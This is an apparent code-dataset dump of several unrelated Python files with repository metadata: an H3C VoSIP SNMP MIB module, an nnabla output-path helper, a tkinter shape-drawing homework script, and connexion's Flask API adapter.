slicer = [slice(rnd_loc[dim][i], rnd_loc[dim][i] + example_size[dim])
for dim in range(rank)]
for j in range(len(image_list)):
ex_image = image_list[j][slicer][np.newaxis]
# Concatenate and return the examples
examples[j] = np.concatenate((examples[j], ex_image), axis=0) \
if (len(examples[j]) != 0) else ex_image
if was_singular:
return examples[0]
return examples
| 36.89547 | 123 | 0.615167 |
340f0c88d7b5d26db2a6fd1f8411a98f923e5dfe
| 12,813 |
py
|
Python
|
pysnmp/H3C-VOSIP-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11 |
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/H3C-VOSIP-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75 |
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/H3C-VOSIP-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10 |
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module H3C-VOSIP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/H3C-VOSIP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:11:30 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion")
h3cVoice, = mibBuilder.importSymbols("HUAWEI-3COM-OID-MIB", "h3cVoice")
InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Bits, MibIdentifier, Counter32, ObjectIdentity, NotificationType, Unsigned32, IpAddress, Integer32, iso, TimeTicks, Counter64, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "MibIdentifier", "Counter32", "ObjectIdentity", "NotificationType", "Unsigned32", "IpAddress", "Integer32", "iso", "TimeTicks", "Counter64", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
h3cVoSIP = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12))
h3cVoSIP.setRevisions(('2005-03-15 00:00',))
if mibBuilder.loadTexts: h3cVoSIP.setLastUpdated('200503150000Z')
if mibBuilder.loadTexts: h3cVoSIP.setOrganization('Huawei 3Com Technologies co., Ltd.')
class SipMsgType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8))
namedValues = NamedValues(("unknown", 1), ("register", 2), ("invite", 3), ("ack", 4), ("prack", 5), ("cancel", 6), ("bye", 7), ("info", 8))
h3cSIPClientMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1))
h3cSIPClientConfigObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1))
h3cSIPID = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPID.setStatus('current')
h3cSIPPasswordType = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("simple", 1), ("cipher", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPPasswordType.setStatus('current')
h3cSIPPassword = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 3), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPPassword.setStatus('current')
h3cSIPSourceIPAddressType = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 4), InetAddressType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPSourceIPAddressType.setStatus('current')
h3cSIPSourceIP = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 5), InetAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPSourceIP.setStatus('current')
h3cSIPRegisterMode = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("gatewayAll", 1), ("gatewaySingle", 2), ("phoneNumber", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPRegisterMode.setStatus('current')
h3cSIPRegisterPhoneNumber = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 7), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPRegisterPhoneNumber.setStatus('current')
h3cSIPRegisterEnable = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPRegisterEnable.setStatus('current')
h3cSIPTrapsControl = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPTrapsControl.setStatus('current')
h3cSIPStatisticClear = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("clear", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPStatisticClear.setStatus('current')
h3cSIPServerConfigTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2), )
if mibBuilder.loadTexts: h3cSIPServerConfigTable.setStatus('current')
h3cSIPServerConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1), ).setIndexNames((0, "H3C-VOSIP-MIB", "h3cSIPServerIPAddressType"), (0, "H3C-VOSIP-MIB", "h3cSIPServerIPAddress"), (0, "H3C-VOSIP-MIB", "h3cSIPServerPort"))
if mibBuilder.loadTexts: h3cSIPServerConfigEntry.setStatus('current')
h3cSIPServerIPAddressType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 1), InetAddressType()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPServerIPAddressType.setStatus('current')
h3cSIPServerIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 2), InetAddress()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPServerIPAddress.setStatus('current')
h3cSIPServerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(5060)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPServerPort.setStatus('current')
h3cSIPServerType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("master", 1), ("slave", 2)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cSIPServerType.setStatus('current')
h3cSIPAcceptType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("inbound", 1), ("all", 2)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cSIPAcceptType.setStatus('current')
h3cSIPServerStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cSIPServerStatus.setStatus('current')
h3cSIPMsgStatTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3), )
if mibBuilder.loadTexts: h3cSIPMsgStatTable.setStatus('current')
h3cSIPMsgStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1), ).setIndexNames((0, "H3C-VOSIP-MIB", "h3cSIPMsgIndex"))
if mibBuilder.loadTexts: h3cSIPMsgStatEntry.setStatus('current')
h3cSIPMsgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 1), SipMsgType())
if mibBuilder.loadTexts: h3cSIPMsgIndex.setStatus('current')
h3cSIPMsgName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 2), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgName.setStatus('current')
h3cSIPMsgSend = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgSend.setStatus('current')
h3cSIPMsgOKSend = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgOKSend.setStatus('current')
h3cSIPMsgReceive = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgReceive.setStatus('current')
h3cSIPMsgOKReceive = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgOKReceive.setStatus('current')
h3cSIPMsgResponseStatTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4), )
if mibBuilder.loadTexts: h3cSIPMsgResponseStatTable.setStatus('current')
h3cSIPMsgResponseStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1), ).setIndexNames((0, "H3C-VOSIP-MIB", "h3cSIPMsgResponseIndex"))
if mibBuilder.loadTexts: h3cSIPMsgResponseStatEntry.setStatus('current')
h3cSIPMsgResponseIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 1), Integer32())
if mibBuilder.loadTexts: h3cSIPMsgResponseIndex.setStatus('current')
h3cSIPMsgResponseCode = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 2), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgResponseCode.setStatus('current')
h3cSIPResCodeRecvCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPResCodeRecvCount.setStatus('current')
h3cSIPResCodeSendCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPResCodeSendCount.setStatus('current')
h3cSIPTrapStubObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 3))
h3cSIPRegisterFailReason = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 3, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 31))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPRegisterFailReason.setStatus('current')
h3cSIPAuthenReqMethod = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 3, 2), SipMsgType()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPAuthenReqMethod.setStatus('current')
h3cSIPClientNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4))
h3cSIPRegisterFailure = NotificationType((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4, 1)).setObjects(("H3C-VOSIP-MIB", "h3cSIPID"), ("H3C-VOSIP-MIB", "h3cSIPServerIPAddressType"), ("H3C-VOSIP-MIB", "h3cSIPServerIPAddress"), ("H3C-VOSIP-MIB", "h3cSIPServerPort"), ("H3C-VOSIP-MIB", "h3cSIPRegisterFailReason"))
if mibBuilder.loadTexts: h3cSIPRegisterFailure.setStatus('current')
h3cSIPAuthenticateFailure = NotificationType((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4, 2)).setObjects(("H3C-VOSIP-MIB", "h3cSIPID"), ("H3C-VOSIP-MIB", "h3cSIPAuthenReqMethod"))
if mibBuilder.loadTexts: h3cSIPAuthenticateFailure.setStatus('current')
h3cSIPServerSwitch = NotificationType((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4, 3))
if mibBuilder.loadTexts: h3cSIPServerSwitch.setStatus('current')
mibBuilder.exportSymbols("H3C-VOSIP-MIB", h3cSIPResCodeRecvCount=h3cSIPResCodeRecvCount, SipMsgType=SipMsgType, h3cSIPMsgResponseIndex=h3cSIPMsgResponseIndex, h3cSIPMsgOKSend=h3cSIPMsgOKSend, h3cSIPMsgResponseStatEntry=h3cSIPMsgResponseStatEntry, h3cSIPMsgResponseCode=h3cSIPMsgResponseCode, h3cSIPID=h3cSIPID, h3cSIPRegisterPhoneNumber=h3cSIPRegisterPhoneNumber, h3cVoSIP=h3cVoSIP, h3cSIPRegisterFailure=h3cSIPRegisterFailure, h3cSIPRegisterFailReason=h3cSIPRegisterFailReason, h3cSIPServerIPAddress=h3cSIPServerIPAddress, h3cSIPTrapStubObjects=h3cSIPTrapStubObjects, h3cSIPPasswordType=h3cSIPPasswordType, h3cSIPRegisterMode=h3cSIPRegisterMode, h3cSIPClientMIB=h3cSIPClientMIB, h3cSIPResCodeSendCount=h3cSIPResCodeSendCount, h3cSIPSourceIP=h3cSIPSourceIP, h3cSIPMsgStatTable=h3cSIPMsgStatTable, h3cSIPServerConfigTable=h3cSIPServerConfigTable, h3cSIPClientConfigObjects=h3cSIPClientConfigObjects, h3cSIPMsgIndex=h3cSIPMsgIndex, h3cSIPServerType=h3cSIPServerType, h3cSIPClientNotifications=h3cSIPClientNotifications, h3cSIPPassword=h3cSIPPassword, h3cSIPMsgStatEntry=h3cSIPMsgStatEntry, PYSNMP_MODULE_ID=h3cVoSIP, h3cSIPServerIPAddressType=h3cSIPServerIPAddressType, h3cSIPMsgName=h3cSIPMsgName, h3cSIPMsgOKReceive=h3cSIPMsgOKReceive, h3cSIPMsgReceive=h3cSIPMsgReceive, h3cSIPTrapsControl=h3cSIPTrapsControl, h3cSIPMsgSend=h3cSIPMsgSend, h3cSIPMsgResponseStatTable=h3cSIPMsgResponseStatTable, h3cSIPRegisterEnable=h3cSIPRegisterEnable, h3cSIPServerConfigEntry=h3cSIPServerConfigEntry, h3cSIPAuthenReqMethod=h3cSIPAuthenReqMethod, h3cSIPServerPort=h3cSIPServerPort, h3cSIPServerStatus=h3cSIPServerStatus, h3cSIPAuthenticateFailure=h3cSIPAuthenticateFailure, h3cSIPServerSwitch=h3cSIPServerSwitch, h3cSIPAcceptType=h3cSIPAcceptType, h3cSIPStatisticClear=h3cSIPStatisticClear, h3cSIPSourceIPAddressType=h3cSIPSourceIPAddressType)
| 124.398058 | 1,827 | 0.758448 |
3bffeafde604e3613f7ea1cfd8b0257afddeae33
| 1,092 |
py
|
Python
|
reinforcement_learning/dqn/output_path.py
|
AaratiAkkapeddi/nnabla-examples
|
db9e5ad850303c158773aeb275e5c3821b4a3935
|
[
"Apache-2.0"
] | 228 |
2017-11-20T06:05:56.000Z
|
2022-03-23T12:40:05.000Z
|
reinforcement_learning/dqn/output_path.py
|
AaratiAkkapeddi/nnabla-examples
|
db9e5ad850303c158773aeb275e5c3821b4a3935
|
[
"Apache-2.0"
] | 36 |
2018-01-11T23:26:20.000Z
|
2022-03-12T00:53:38.000Z
|
reinforcement_learning/dqn/output_path.py
|
AaratiAkkapeddi/nnabla-examples
|
db9e5ad850303c158773aeb275e5c3821b4a3935
|
[
"Apache-2.0"
] | 76 |
2017-11-22T22:00:00.000Z
|
2022-03-28T05:58:57.000Z
|
# Copyright 2019,2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
class OutputPath(object):
def __init__(self, path='./tmp.output/'):
if not os.path.isdir(path):
os.makedirs(path)
self.path = path
def get_filepath(self, name):
return os.path.join(self.path, name)
_default_output_path = None
def default_output_path():
global _default_output_path
if _default_output_path is None:
_default_output_path = OutputPath()
return _default_output_path
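# A small usage sketch (file names are illustrative): both calls resolve a file
# name against the output directory, creating the directory on demand.
#
#     default_output_path().get_filepath('model.h5')
#     OutputPath('./results/').get_filepath('log.txt')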
| 29.513514 | 74 | 0.728022 |
b27588331abbe7e533168e14108529e9a2864cb8
| 2,314 |
py
|
Python
|
CS-190/Homework/HW10.py
|
lividsubset3/College-CS
|
6f1eb6b10e43a37654335331758677c797034961
|
[
"MIT"
] | null | null | null |
CS-190/Homework/HW10.py
|
lividsubset3/College-CS
|
6f1eb6b10e43a37654335331758677c797034961
|
[
"MIT"
] | null | null | null |
CS-190/Homework/HW10.py
|
lividsubset3/College-CS
|
6f1eb6b10e43a37654335331758677c797034961
|
[
"MIT"
] | null | null | null |
from tkinter import *
root = Tk()
root.title('Homework 10')
canvas = Canvas(root, width=400, height=400)
canvas.pack()
def circle(x, y, radius, color):
canvas.create_oval(x, y, x + radius, y + radius, fill=color, outline=color)
def rectangle(x, y, width, height, color):
canvas.create_rectangle(x, y, x + width, y + height, fill=color, outline=color)
def triangle(x, y, size, color):
canvas.create_polygon(x - size // 2, y, x + size // 2, y, x, y - size // 2, fill=color, outline=color)
# do not modify code above this line!
# ===============================================================================================
def go():
try:
init = input("Input File: ")
# init = "HW10.txt"
with open(init) as f:
for line in f:
L = line.split(' ')
for shape_type in L:
if shape_type == 'triangle':
x = int(L[1])
y = int(L[2])
size = int(L[3])
color = L[4].rstrip()
triangle(x, y, size, color)
elif shape_type == 'rectangle':
x = int(L[1])
y = int(L[2])
width = int(L[3])
height = int(L[4])
color = L[5].rstrip()
rectangle(x, y, width, height, color)
elif shape_type == 'circle':
x = int(L[1])
y = int(L[2])
radius = int(L[3])
color = L[4].rstrip()
circle(x, y, radius, color)
elif shape_type == 'square':
x = int(L[1])
y = int(L[2])
width = int(L[3])
height = int(L[3])
color = L[4].rstrip()
rectangle(x, y, width, height, color)
except Exception as e:
print(e)
print("Error | 404 | File Not found")
# do not modify code below this line!
# ===============================================================================================
if __name__ == '__main__':
go()
root.mainloop()
| 33.057143 | 106 | 0.386776 |
d2050b106573523514b5e814277d3e77d1466622
| 12,740 |
py
|
Python
|
connexion/apis/flask_api.py
|
engsas/connexion
|
abb43a42fb62ef56cb1e0f06c2167cca2f5b9f96
|
[
"Apache-2.0"
] | 1 |
2020-04-07T05:26:37.000Z
|
2020-04-07T05:26:37.000Z
|
connexion/apis/flask_api.py
|
engsas/connexion
|
abb43a42fb62ef56cb1e0f06c2167cca2f5b9f96
|
[
"Apache-2.0"
] | 3 |
2021-08-30T16:30:50.000Z
|
2022-03-01T23:15:44.000Z
|
connexion/apis/flask_api.py
|
engsas/connexion
|
abb43a42fb62ef56cb1e0f06c2167cca2f5b9f96
|
[
"Apache-2.0"
] | 3 |
2018-06-26T22:54:02.000Z
|
2019-04-03T20:54:17.000Z
|
import logging
import warnings
import flask
import werkzeug.exceptions
from connexion.apis import flask_utils
from connexion.apis.abstract import AbstractAPI
from connexion.handlers import AuthErrorHandler
from connexion.jsonifier import Jsonifier
from connexion.lifecycle import ConnexionRequest, ConnexionResponse
from connexion.utils import is_json_mimetype, yamldumper
from werkzeug.local import LocalProxy
logger = logging.getLogger('connexion.apis.flask_api')
class FlaskApi(AbstractAPI):
def _set_base_path(self, base_path):
super(FlaskApi, self)._set_base_path(base_path)
self._set_blueprint()
def _set_blueprint(self):
logger.debug('Creating API blueprint: %s', self.base_path)
endpoint = flask_utils.flaskify_endpoint(self.base_path)
self.blueprint = flask.Blueprint(endpoint, __name__, url_prefix=self.base_path,
template_folder=str(self.options.openapi_console_ui_from_dir))
def add_openapi_json(self):
"""
Adds spec json to {base_path}/swagger.json
or {base_path}/openapi.json (for oas3)
"""
logger.debug('Adding spec json: %s/%s', self.base_path,
self.options.openapi_spec_path)
endpoint_name = "{name}_openapi_json".format(name=self.blueprint.name)
self.blueprint.add_url_rule(self.options.openapi_spec_path,
endpoint_name,
self._handlers.get_json_spec)
def add_openapi_yaml(self):
"""
Adds spec yaml to {base_path}/swagger.yaml
or {base_path}/openapi.yaml (for oas3)
"""
if not self.options.openapi_spec_path.endswith("json"):
return
openapi_spec_path_yaml = \
self.options.openapi_spec_path[:-len("json")] + "yaml"
logger.debug('Adding spec yaml: %s/%s', self.base_path,
openapi_spec_path_yaml)
endpoint_name = "{name}_openapi_yaml".format(name=self.blueprint.name)
self.blueprint.add_url_rule(
openapi_spec_path_yaml,
endpoint_name,
self._handlers.get_yaml_spec
)
def add_swagger_ui(self):
"""
Adds swagger ui to {base_path}/ui/
"""
console_ui_path = self.options.openapi_console_ui_path.strip('/')
logger.debug('Adding swagger-ui: %s/%s/',
self.base_path,
console_ui_path)
if self.options.openapi_console_ui_config is not None:
config_endpoint_name = "{name}_swagger_ui_config".format(name=self.blueprint.name)
config_file_url = '/{console_ui_path}/swagger-ui-config.json'.format(
console_ui_path=console_ui_path)
self.blueprint.add_url_rule(config_file_url,
config_endpoint_name,
lambda: flask.jsonify(self.options.openapi_console_ui_config))
static_endpoint_name = "{name}_swagger_ui_static".format(name=self.blueprint.name)
static_files_url = '/{console_ui_path}/<path:filename>'.format(
console_ui_path=console_ui_path)
self.blueprint.add_url_rule(static_files_url,
static_endpoint_name,
self._handlers.console_ui_static_files)
index_endpoint_name = "{name}_swagger_ui_index".format(name=self.blueprint.name)
console_ui_url = '/{console_ui_path}/'.format(
console_ui_path=console_ui_path)
self.blueprint.add_url_rule(console_ui_url,
index_endpoint_name,
self._handlers.console_ui_home)
def add_auth_on_not_found(self, security, security_definitions):
"""
        Adds a 404 error handler to authenticate and only expose the 404 status if the security validation passes.
"""
logger.debug('Adding path not found authentication')
not_found_error = AuthErrorHandler(self, werkzeug.exceptions.NotFound(), security=security,
security_definitions=security_definitions)
endpoint_name = "{name}_not_found".format(name=self.blueprint.name)
self.blueprint.add_url_rule('/<path:invalid_path>', endpoint_name, not_found_error.function)
def _add_operation_internal(self, method, path, operation):
operation_id = operation.operation_id
logger.debug('... Adding %s -> %s', method.upper(), operation_id,
extra=vars(operation))
flask_path = flask_utils.flaskify_path(path, operation.get_path_parameter_types())
endpoint_name = flask_utils.flaskify_endpoint(operation.operation_id,
operation.randomize_endpoint)
function = operation.function
self.blueprint.add_url_rule(flask_path, endpoint_name, function, methods=[method])
@property
def _handlers(self):
# type: () -> InternalHandlers
if not hasattr(self, '_internal_handlers'):
self._internal_handlers = InternalHandlers(self.base_path, self.options, self.specification)
return self._internal_handlers
@classmethod
def get_response(cls, response, mimetype=None, request=None):
"""Gets ConnexionResponse instance for the operation handler
result. Status Code and Headers for response. If only body
data is returned by the endpoint function, then the status
code will be set to 200 and no headers will be added.
If the returned object is a flask.Response then it will just
pass the information needed to recreate it.
:type response: flask.Response | (flask.Response,) | (flask.Response, int) | (flask.Response, dict) | (flask.Response, int, dict)
:rtype: ConnexionResponse
"""
return cls._get_response(response, mimetype=mimetype, extra_context={"url": flask.request.url})
@classmethod
def _is_framework_response(cls, response):
""" Return True if provided response is a framework type """
return flask_utils.is_flask_response(response)
@classmethod
def _framework_to_connexion_response(cls, response, mimetype):
""" Cast framework response class to ConnexionResponse used for schema validation """
return ConnexionResponse(
status_code=response.status_code,
mimetype=response.mimetype,
content_type=response.content_type,
headers=response.headers,
body=response.get_data(),
)
@classmethod
def _connexion_to_framework_response(cls, response, mimetype, extra_context=None):
""" Cast ConnexionResponse to framework response class """
flask_response = cls._build_response(
mimetype=response.mimetype or mimetype,
content_type=response.content_type,
headers=response.headers,
status_code=response.status_code,
data=response.body,
extra_context=extra_context,
)
return flask_response
@classmethod
def _build_response(cls, mimetype, content_type=None, headers=None, status_code=None, data=None, extra_context=None):
if cls._is_framework_response(data):
return flask.current_app.make_response((data, status_code, headers))
data, status_code, serialized_mimetype = cls._prepare_body_and_status_code(data=data, mimetype=mimetype, status_code=status_code, extra_context=extra_context)
kwargs = {
'mimetype': mimetype or serialized_mimetype,
'content_type': content_type,
'headers': headers,
'response': data,
'status': status_code
}
kwargs = {k: v for k, v in kwargs.items() if v is not None}
return flask.current_app.response_class(**kwargs) # type: flask.Response
@classmethod
def _serialize_data(cls, data, mimetype):
# TODO: harmonize flask and aiohttp serialization when mimetype=None or mimetype is not JSON
# (cases where it might not make sense to jsonify the data)
if (isinstance(mimetype, str) and is_json_mimetype(mimetype)):
body = cls.jsonifier.dumps(data)
elif not (isinstance(data, bytes) or isinstance(data, str)):
warnings.warn(
"Implicit (flask) JSON serialization will change in the next major version. "
"This is triggered because a response body is being serialized as JSON "
"even though the mimetype is not a JSON type. "
"This will be replaced by something that is mimetype-specific and may "
"raise an error instead of silently converting everything to JSON. "
"Please make sure to specify media/mime types in your specs.",
FutureWarning # a Deprecation targeted at application users.
)
body = cls.jsonifier.dumps(data)
else:
body = data
return body, mimetype
@classmethod
def get_request(cls, *args, **params):
# type: (*Any, **Any) -> ConnexionRequest
"""Gets ConnexionRequest instance for the operation handler
result. Status Code and Headers for response. If only body
data is returned by the endpoint function, then the status
code will be set to 200 and no headers will be added.
If the returned object is a flask.Response then it will just
pass the information needed to recreate it.
:rtype: ConnexionRequest
"""
context_dict = {}
setattr(flask._request_ctx_stack.top, 'connexion_context', context_dict)
flask_request = flask.request
request = ConnexionRequest(
flask_request.url,
flask_request.method,
headers=flask_request.headers,
form=flask_request.form,
query=flask_request.args,
body=flask_request.get_data(),
json_getter=lambda: flask_request.get_json(silent=True),
files=flask_request.files,
path_params=params,
context=context_dict
)
logger.debug('Getting data and status code',
extra={
'data': request.body,
'data_type': type(request.body),
'url': request.url
})
return request
@classmethod
def _set_jsonifier(cls):
"""
Use Flask specific JSON loader
"""
cls.jsonifier = Jsonifier(flask.json, indent=2)
def _get_context():
return getattr(flask._request_ctx_stack.top, 'connexion_context')
context = LocalProxy(_get_context)
class InternalHandlers(object):
"""
Flask handlers for internally registered endpoints.
"""
def __init__(self, base_path, options, specification):
self.base_path = base_path
self.options = options
self.specification = specification
def console_ui_home(self):
"""
Home page of the OpenAPI Console UI.
:return:
"""
openapi_json_route_name = "{blueprint}.{prefix}_openapi_json"
escaped = flask_utils.flaskify_endpoint(self.base_path)
openapi_json_route_name = openapi_json_route_name.format(
blueprint=escaped,
prefix=escaped
)
template_variables = {
'openapi_spec_url': flask.url_for(openapi_json_route_name)
}
if self.options.openapi_console_ui_config is not None:
template_variables['configUrl'] = 'swagger-ui-config.json'
return flask.render_template('index.j2', **template_variables)
def console_ui_static_files(self, filename):
"""
Servers the static files for the OpenAPI Console UI.
:param filename: Requested file contents.
:return:
"""
# convert PosixPath to str
static_dir = str(self.options.openapi_console_ui_from_dir)
return flask.send_from_directory(static_dir, filename)
def get_json_spec(self):
return flask.jsonify(self._spec_for_prefix())
def get_yaml_spec(self):
return yamldumper(self._spec_for_prefix()), 200, {"Content-Type": "text/yaml"}
def _spec_for_prefix(self):
"""
Modify base_path in the spec based on incoming url
This fixes problems with reverse proxies changing the path.
"""
base_path = flask.url_for(flask.request.endpoint).rsplit("/", 1)[0]
return self.specification.with_base_path(base_path).raw
avg_line_length: 40.96463 | max_line_length: 166 | alphanum_fraction: 0.642465
